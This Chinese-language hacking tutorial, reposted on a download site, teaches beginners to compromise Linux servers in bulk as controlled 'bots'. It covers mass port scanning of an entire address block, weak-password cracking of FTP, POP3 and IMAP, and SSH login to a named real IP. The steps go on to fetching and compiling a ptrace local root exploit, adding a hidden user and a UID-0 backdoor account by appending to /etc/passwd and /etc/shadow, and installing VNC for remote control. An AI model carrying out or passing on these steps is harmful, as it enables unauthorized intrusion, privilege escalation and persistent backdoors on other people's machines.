投向Linux肉雞的懷抱
發表時間:2023-06-02 來源:明輝站整理相關軟件相關文章人氣:
[摘要]適合讀者:入侵愛好者、普通Linux網民前置知識:Linux基本操作投向Linux肉雞的懷抱文/圖 密界尋蹤 很多菜鳥都在重復的玩3389肉雞, 時間長了自然就膩味了, 非常夢想得到自己的Li...
適合讀者:入侵愛好者、普通Linux網民
前置知識:Linux基本操作
投向Linux肉雞的懷抱
文/圖 密界尋蹤
很多菜鳥都在重復的玩3389肉雞, 時間長了自然就膩味了, 非常夢想得到自己的Linux肉雞。 今天我就寫一篇關于菜鳥如何獲得大量Linux肉雞的方法。
需要工具如下:Ssport, 下載地址:
HSCAN, 下載地址:
http://www.cnhonker.com/download/releases/Tools/hscan.zip
Putty, 下載地址:
另外還需要一個VNC的Linux版本, 頭一次得到自己的Linux肉雞, 當然要看看它的桌面了。 工具基本齊全了, 下面首先請出Ssport這個強大的、特別適合新手入侵者使用的掃描器。 程序界面如圖1所示。

圖1
軟件的中部位置有端口設置, 我們添加如下端口22, 23, 512, 513, 514。 程序上方有IP段落設置, 既然想得到大量Linux肉雞, 范圍不防設置大點, 211.0.0.1_211.255.255.255(腳本小子:記得在自己比較穩定的3389肉雞上掃描, 自己的機器可舍不得啊, 太費電了吧?)。
經過好幾天的等待, 終于掃描結束了。 其實Ssport非常方便, 中途你覺得差不多的時候, 可以保存部分結果進行下一步動作。 讓這個工具繼續掃描時候, 它不但從原先的結束點開始, 還會問你是把掃描的結果剪除后繼續掃描, 還是不刪除原先的結果掃描, 很體貼的。 將結果導出為一個文本文件, 我們需要簡單處理。 如圖2所示。

圖2
選擇替換把22、23、512、513、514全部處理掉, 就會得到一個干凈的IP地址列表。 下面就需要我們的第二個工具HSCAN出場了。 程序的界面如圖3所示。

圖3
我們依次選Menu菜單->Pamareter子菜單->Hostlist, 把我們剛才整理的IP地址文本導入, 還要記得把Ping host before scan選項給去掉, 這樣可以多得到些信息, 不過花費的時間更長。
掃描范圍選擇好了, 再來選擇掃描模塊, Modules在這里我們選擇Check ftp weak accounts、Check pop3 weak accounts和Check imap weak accounts三個模塊, 開始掃描吧!最終HSCAN會給我們一份掃描報告。 如圖4所示。

圖4
看清楚了么?我們仔細的看這份報告。 對于發現了弱口令, 且關于FTP、POP、IMAP版本有WU-FTP、VSFTP、PROFTP和Linux、Unix字樣的肯定就是Linux系統。 看到了報告嗎?61.197.254.149這個IP就有弱口令, 它的FTP版本是WU-2.6.2.5, 肯定是一個Linux系統。
現在我們要想辦法登陸上它的系統, 這時候用我們的第三個工具Putty。 如果你還保存有IP地址的原始數據, 就是剛剛用SSPORT掃描后還帶有端口信息的那個文本, 我們就可以查到61.197.254.149這個IP開放的端口信息, 它的22端口是開放的。 這正好方便我們, 打開PUTTY, 填寫IP61.197.254.149, 選擇SSH協議, 點擊打開。 過一會兒會彈出如圖5所示的界面。

圖5
我們只要點YES就會出現登陸提示, 按照掃描出來的弱口令點登陸就連接到對方主機上了。 如圖6所示。

圖6
輸入命令Uname –a查看內核版本, 一般版本都不高, 給大家推薦一個好的本地溢出代碼, 連接地址如下:http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c。 我們先在命令提示下輸入Cat >1.c, 然后選擇復制這段代碼, 粘貼到肉雞上。 如圖8所示。

圖8
然后用Ctrl+z鍵這段代碼就被保存在肉雞上了。 下面我們編譯它, 輸入命令“gcc -o 1 1.c”, 如圖9所示。

圖9
然后執行這個命令, 哈哈, 看到了么?所有的ID為0, 提示符變成了#號, 我們已經是管理員了!如圖10所示。

圖10
加個自己的用戶吧:
mkdir /home/.network
echo network::500:500::/home/.network:/bin/bash>>/etc/passwd
echo network::::::::>>/etc/shadow
passwd network
加個管理員以后方便自己:
echo xctc::::::::>>/etc/shadow
echo xctc::0:0::/home/.network:/bin/bash>>/etc/passwd
passwd xctc
如圖11所示。

圖11
好了, 入侵告一段落。
相信很多菜鳥都很渴望看到Linux的桌面。 那么我們就給他安裝VNC吧, 因為它是跨平臺的, 而且客戶端訪問可以在瀏覽器里面進行。 安裝方法很簡單:
tar zxvf vnc-3.3.3r1_x86_linux_2.0.tgz
cd vnc_x86_linux_2.0
cp *vnc* /usr/local/bin/
mkdir /usr/local/vnc
cp -r classes/ /usr/local/vnc/
設置Vnc Server的訪問密碼:
vncpasswd
啟動Vnc Server:
vncserver
最新版本的VNC安裝方式就更簡單了, 大家可以到這里去下載:
http://www.realvnc.com
安裝好后有時候不能看到漂亮的Linux桌面, 需要我們執行下面命令的任何一個, Startkde或者Gnome-session, 這兩命令一個是啟動到KDE桌面, 一個是啟動到GNOME桌面。 先給大家一個截圖誘惑大家一下吧!這可是在Windows下控制Linux哦!如圖12所示。

圖12
另外大家可以到以下站點找Linux的本地和遠程溢出代碼:
www.netric.org
http://www.packetstormsecurity.org/
www.cnhonker.com
這篇文章只是希望能指導一下和我一樣的菜鳥們, 高手請悟見笑。 歡迎加我的QQ互相探討交流Linux的入侵經驗:33550。 謝謝觀賞。
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。